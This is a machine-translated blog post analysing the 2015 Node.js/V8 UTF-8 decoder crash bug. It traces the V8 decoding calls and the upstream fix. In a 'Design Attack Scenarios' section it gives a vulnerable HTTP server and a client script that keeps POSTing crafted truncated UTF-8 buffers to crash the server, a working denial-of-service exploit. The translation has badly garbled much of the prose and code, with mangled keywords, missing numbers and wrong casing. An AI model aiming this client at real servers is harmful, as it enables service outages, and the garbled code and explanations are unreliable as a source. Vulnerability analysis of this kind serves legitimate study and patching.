Background
The node. JS community recently burst into a hole at the American Independence Day weekend spree
https://medium.com/@iojs/important-security-upgrades-for-node-js-and-io-js-8ac14ece5852
First, give a piece of code that will trigger the vulnerability
Run directly on the v0.12.4 version of node and immediately crash.
Below we analyze in detail the principle of the vulnerability.
Call stack
The above code constructs a buffer of length 1025, and then calls the buffer's ToString method to decode the UTF8 character, usually in the development of the usual call. But why does this cause crash, and what is the difference between the usual writing?
The sample code is small, but there are a lot of calls involved, from JS to C + + in node, to the lower V8 call. The approximate process is as shown.
Critical call
There are several more critical invocation procedures that result from this vulnerability.
Utf8decoderbase::reset
Every Utf8DecoderBase
object instantiated by a class has a private property buffer_
,
private: uint16_t buffer_[kBufferSize];
Where Utfdecoder's kbuffersize is set to 512,buffer used as a buffer for storing decoded UTF8 characters. It is important to note that 512 is not the number of bytes, but the number of characters, some UTF8 characters need only one such character to be able to represent, some need 2. The smile character used to construct buffer in the sample code requires 2 such characters to represent 4 bytes to store. So the number of bytes that buffer can store is 512*2=1024.
If the buffer to be decoded does not exceed 1024, it can be completely decoded in buffer. The characters decoded to buffer v8::internal::OS::MemCopy(data, buffer_, memcpy_length*sizeof(uint16_t))
are copied to the memory area of the string that is returned to node using the call.
Utf8decoderbase::writeutf16slow
However, when the buffer to be decoded is longer than 1024 bytes, the first 1024 bytes are decoded or stored by the Buffer_ buffer above, and the remaining characters to be decoded are Utf8DecoderBase::WriteUtf16Slow
processed.
voidUtf8decoderbase:: Writeutf16slow(Const uint8_t*Stream, uint16_t* Data, unsigned data_length) { while(Data_length!= 0) {unsigned cursor= 0; uint32_t character=Utf8:: ValueOf(Stream, Utf8:: Kmaxencodedsize,&cursor);//There ' s a total lack of bounds checking for stream //As it was already do in Reset.Stream+=Cursorif(character>Unibrow:: Utf16:: Kmaxnonsurrogatecharcode) {*Data++ =Utf16:: Leadsurrogate(character);*Data++ =Utf16:: Trailsurrogate(character); Dcheck (data_length> 1); Data_length-= 2; }Else{*Data++ =Character Data_length-= 1; } }}
Writeutf16slow decodes the remaining decoded buffer calls utf8::valueof and outputs one UTF8 character at a time when the utf8::valueof is called. Where data_length represents the number of characters that also need to be decoded (note that the number of characters is not utf8, but uint16_t) until the remaining data_length characters are all decoded.
Utf8::valueof
As mentioned above, call Utf8::valueof decodes a UTF8 character from the remaining buffer, and when the UTF8 character needs to be stored in multiple bytes, it is called to Utf8::calculatevalue, Utf8:: calculatevalue resolves a utf8 character from buffer according to the encoding rules of the UTF8 character. The detailed rules of UTF8 coding can refer to the Nanyi Teacher blog's article "character code notes: Ascii,unicode and UTF-8", which explains the UTF8 coding rules in great detail.
uchar Utf8::CalculateValue(const byte* str, unsigned length, unsigned* cursor)
Where the first parameter represents the buffer to be decoded, the second parameter indicates the number of bytes that can be read, and the last parameter cursor represents the offset of buffer after parsing, which is the number of bytes that the UTF8 character occupies.
Example analysis
After a brief explanation of the invocation link at the execution of the instance code, we then combine the sample code for the specific invocation analysis.
Buffer creation
First the sample code uses a 4-byte smile character, constructs a buffer of length 257*4=1028, and then calls Slice (0,-3) to remove the last 3 bytes, as shown in.
Buffer decoding
The Buffer.tostring () method is then called to decode Buffer as a UTF string. Since the character to be decoded is 1025, the first 1024 bytes will decode 512 characters (216 emoticons) in Utf8decoderbase::reset to Buffer_, the remaining buffer 0xf0
is passed in to Utf8decoderbase::writeutf16slow to continue decoding.
void Utf8DecoderBase::WriteUtf16Slow(const uint8_t* stream, uint16_t* data, unsigned data_length);
Stream stores the decoded characters for the buffer,data to be decoded, and datalength indicates the number of characters to decode. At this point the 512 characters in the buffer buffers have been copied to the data.
Last buffer
The remaining last buffer is 0xf0
given to utf8decoderbase::writeutf16slow processing, which is decoded by calling Utf8::valueof.
The binary of the last byte (0xf0).toString(2)=‘11110000‘
is, according to the UTF8 encoding rule, a starting byte that occupies a 4-byte UTF8 character, and continues to call Utf8::calculatevalue to read the following character.
Since the previous full buffer was truncated by 3 bytes, it is desirable to read the next byte again when the binary 0x00
is in (0x00).toString(2)=‘00000000‘
. Obviously, the byte that does not conform to the expected UTF8 rule 10xxxxxx
, the function returns Kbadchar (0xFFFD). At this point the entire decoding end, the program no crash.
Finally crash
It says the ideal, but actually because of the V8 engine's memory management strategy, reading the last buffer to continue reading the next byte is likely to read dirty data (according to my printed log found that the probability of reading dirty data is very high, log details), If you continue to read the dirty data just as the last byte combination satisfies the UTF8 encoding rule (which is also very high), you read a valid UTF8 character (both characters), and the ideal should read Kbadchar (one character ), then what is the problem?
We'll go back to Utf8decoderbase::writeutf16slow's call.
voidUtf8decoderbase:: Writeutf16slow(Const uint8_t*Stream, uint16_t* Data, unsigned data_length) { while(Data_length!= 0) {unsigned cursor= 0; uint32_t character=Utf8:: ValueOf(Stream, Utf8:: Kmaxencodedsize,&cursor);//There ' s a total lack of bounds checking for stream //As it was already do in Reset.Stream+=Cursorif(character>Unibrow:: Utf16:: Kmaxnonsurrogatecharcode) {*Data++ =Utf16:: Leadsurrogate(character);*Data++ =Utf16:: Trailsurrogate(character); Dcheck (data_length> 1); Data_length-= 2; }Else{*Data++ =Character Data_length-= 1; } }}
At this point data_length=1, call uint32_t character = utf8::valueof (stream, Utf8::kmaxencodedsize, &cursor), After reading the dirty data that satisfies the encoding rule, the IF condition satisfies and executes DCHECK(data_length > 1)
, and at this time data_length=1, the assertion fails, the process exits (but on my Mac the system does not exit because of an assertion failure, and then continues to execute data_length-=2, Data_ Length=-1,while Loop cannot exit, generating bus error process crash).
do { if (!(condition)) { V8_Fatal(__FILE____LINE__"CHECK(%s) failed"#condition); \ } while (0)
Design Attack Scenarios
Understanding the vulnerability principle, design an attack scheme is much simpler, as long as there are involved in the buffer operation can generate attacks, web development is common in the server attack, the following we use this vulnerability to design a server attack scenario, resulting in the attack server process crash, Service cannot be improved normally.
Web development often has a POST request, and the node server receives a POST request to the server data, will inevitably use to buffer, so the main solution is to the node server constantly post maliciously constructed buffer.
Server
Start a server that can receive post data using native HTTP modules
varHTTP =require(' http '); Http.createserver ( function(req, res){ if(Req.method = =' POST ') {varBUF = [], Len =0; Req.on (' Data ', function(chunk){Buf.push (chunk); Len + = Chunk.length; }); Req.on (' End ', function(){ varstr = BUFFER.CONCAT (Buf,len). toString (); Res.end (str); }); }Else{Res.end (' node '); }}). Listen ( the);
Client
Since reading dirty memory data and need to meet UTF8 encoding rules there is a certain probability, so the client has to constantly post to the server, in order to speed up the server crash, we send a slightly larger buffer
varNET =require(' Net ');varCRLF =' \ r \ n '; functionsend () { varConnect = Net.connect ({' Host ':' 127.0.0.1 ',' Port ': the}, function(){ //console.log (' Connected ', New Date ());}); SendRequest (Connect,'/post ');} Send (); SetInterval ( function(){Send ()}, -);varI=0; function sendrequest(Connect, path) { varSmile = Buffer (4); smile[0] =0xf0; smile[1] =0x9f; smile[2] =0x98; smile[3] =0x8a; Smile = Smile.tostring ();varBUF = Buffer (Array(16385). Join (smile)). Slice (0,-3); Connect.write (' POST '+path+' http/1.1 '); Connect.write (CRLF); Connect.write (' host:127.0.0.1 '); Connect.write (CRLF); Connect.write (' connection:keep-alive '); Connect.write (CRLF); Connect.write (' content-length: '+buf.length); Connect.write (CRLF); Connect.write (' Content-type:application/json;charset=utf-8 '); Connect.write (CRLF); Connect.write (CRLF); Connect.write (BUF); Console.log (i++);}
After starting the server, the client Script Discovery server is crash quickly.
Bug fixes
Understanding the vulnerability principle after the repair is very simple, the main reason is to call utf8::valueof parsing characters will be read to the code rules of the dirty data, and this is because the second parameter passed in is a constant 4, the last time only one byte left to continue reading. Node's official practice is to call this method when the remaining number of bytes to be decoded, so that when parsing to the last byte will not continue to read the dirty data, naturally will not cause an assertion failure or a dead loop caused the process to crash.
Resources
- Important security upgrades for node. JS and Io.js
- [Fix Out-of-band write in UTF8 decoder] (https://github.com/joyent/node/commit/78b0e30954111cfaba0edbeee85450d8cbc6fdf6#diff-a3a7e2cde125f05dfde738eb27977f4fR181)
- Character-coded notes: Ascii,unicode and UTF-8
- JavaScript ' s internal character encoding:ucs-2 or UTF-16?
Original link HTTPS://GITHUB.COM/HUSTXIAOC/NODE.JS/ISSUES/9
Talk about the node. JS Independence Day Vulnerability